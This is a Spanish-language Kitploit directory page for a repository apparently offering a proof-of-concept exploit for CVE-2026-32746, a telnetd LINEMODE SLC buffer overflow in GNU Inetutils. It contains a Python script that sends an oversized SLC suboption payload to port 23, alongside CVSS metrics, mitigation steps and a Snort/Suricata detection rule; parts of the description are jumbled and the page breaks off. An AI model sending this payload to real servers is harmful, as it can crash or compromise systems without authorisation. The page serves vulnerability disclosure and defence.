Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kaleth4/cve-2026-32746
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

Proof-of-concept exploit for CVE-2026-32746, a critical remote code execution vulnerability in GNU Inetutils telnetd via LINEMODE SLC buffer overflow. Includes technical analysis, CVSS metrics, and mitigation guidance.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 Resumen Ejecutivo

Vulnerabilidad Crítica | CVSS 9.8 | ¡Ejecución Remota de Código! Afecta: GNU Inetutils Telnetd (versiones previas a 2.7) Tipo: OOB Write en el manejador de subopciones LINEMODE SLC Vector de Ataque: Red (Puerto 23) | Sin autenticación requerida Impacto: RCE con privilegios del proceso Telnetd


🎯 📖 Descripción Técnica

Se ha identificado un desbordamiento de búfer por escritura fuera de límites (OOB Write) en la función add_slc del demonio de . Este fallo permite a un atacante remoto mediante la manipulación de las del protocolo Telnet.

telnetd
GNU Inetutils
inyectar código arbitrario
subopciones SLC (Set Local Characters)

🔍 Detalles Clave

  • Función Vulnerable: add_slc (procesamiento de caracteres locales).
  • Causa Raíz: Falta de validación de límites en el búfer interno.
  • Explotación: Envío masivo de secuencias maliciosas LINEMODE SLC.
  • Requisitos: Ninguno (acceso directo al puerto 23).

🛠️ 💻 Proof of Concept (PoC)

Un atacante puede explotar esta vulnerabilidad mediante un payload Telnet malicioso que satura el búfer interno:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ ¡ADVERTENCIA! Este código es solo para fines educativos y de investigación. Su uso en sistemas sin autorización es ilegal.


📊 📈 Métricas de Riesgo (CVSS 3.1)

MétricaValorDescripción
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HRemoto, sin autenticación
Puntuación9.8 (CRÍTICO) 🔴Alto impacto en confidencialidad, integridad y disponibilidad
Publicación13 de marzo, 2026Última modificación: 5 de mayo, 2026

🛡️ 🔒 Mitigación y Soluciones

🚀 Solución Inmediata

✅ Actualizar GNU Inetutils a la versión parcheada (post-2.7).

⚡ Workarounds

🔹 Deshabilitar telnetd y migrar a SSH (recomendado). 🔹 Bloquear el puerto 23 en firewalls perimetrales. 🔹 Configurar IDS/IPS para detectar secuencias LINEMODE SLC anómalas.

🛡️ Configuración de Seguridad Adicional

  • Reglas Snort/Suricata:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
  • **
Descargar herramienta